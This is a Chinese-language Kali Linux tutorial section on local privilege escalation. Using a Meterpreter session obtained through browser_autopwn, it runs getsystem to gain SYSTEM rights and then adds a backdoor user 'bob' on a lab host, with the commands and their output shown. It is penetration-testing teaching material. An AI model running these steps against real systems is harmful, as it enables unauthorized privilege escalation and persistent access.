• 7.2 本地权限提升

    7.2 本地权限提升

    上一节介绍了窃取目标系统令牌,现在来介绍窃取令牌后如何提升在目标系统上的权限。提升本地权限可以使用户访问目标系统,并且进行其他的操作,如创建用户和组等。本节将介绍本地权限提升。

    同样的实现本地权限提升,也需要连接到Meterpreter会话,具体操作就不再介绍。本地权限提升的具体操作步骤如下所示。

    (1)启动Meterpreter会话。执行命令如下所示:

    1. msf auxiliary(browser_autopwn) > sessions -i 1
    2. [*] Starting interaction with 1
    3. meterpreter >

    从输出的信息可以看到,成功启动了Meterpreter会话。

    (2)使用getsystem命令提升本地权限。首先,查看该命令的帮助信息。执行命令如下所示:

    1. meterpreter > getsystem -h
    2. Usage: getsystem [options]
    3. Attempt to elevate your privilege to that of local system.
    4. OPTIONS:
    5. -h Help Banner.
    6. -t <opt> The technique to use. (Default to '0').
    7. 0 : All techniques available
    8. 1 : Service - Named Pipe Impersonation (In Memory/Admin)
    9. 2 : Service - Named Pipe Impersonation (Dropper/Admin)
    10. 3 : Service - Token Duplication (In Memory/Admin)

    输出的信息显示了getsystem命令的语法格式、作用及选项等。此时就可以根据自己的需要,使用相应的选项来提升本地权限。

    (3)使用getsystem命令提升本地权限。执行命令如下所示:

    1. meterpreter > getsystem
    2. got system (via technique 1).
    3. meterpreter >

    从输出的信息可以看到,自动选择了方法1。此时该用户就拥有了目标系统中Test用户的权限了,然后就可以做其他的操作,如创建文件、创建用户和组等。如使用该用户在目标系统上192.168.41.146创建一个名为bob的用户。执行命令如下所示:

    1. meterpreter > add_user bob 123456 -h 192.168.41.146

    执行以上命令后,可以在主机192.168.41.146上查看到创建的bob用户。

    原文: https://wizardforcel.gitbooks.io/daxueba-kali-linux-tutorial/content/37.html